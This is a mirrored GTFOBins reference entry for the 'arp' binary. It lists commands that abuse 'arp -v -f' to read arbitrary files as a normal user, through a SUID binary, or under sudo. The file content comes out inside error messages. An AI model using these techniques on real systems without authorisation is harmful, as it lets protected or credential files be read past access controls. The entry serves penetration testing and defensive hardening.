mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
18 lines
328 B
Markdown
18 lines
328 B
Markdown
|
---
|
||
|
description: |
|
||
|
The read file content is corrupted by error prints.
|
||
|
functions:
|
||
|
file-read:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
arp -v -f "$LFILE"
|
||
|
suid:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
./arp -v -f "$LFILE"
|
||
|
sudo:
|
||
|
- code: |
|
||
|
LFILE=file_to_read
|
||
|
sudo arp -v -f "$LFILE"
|
||
|
---
|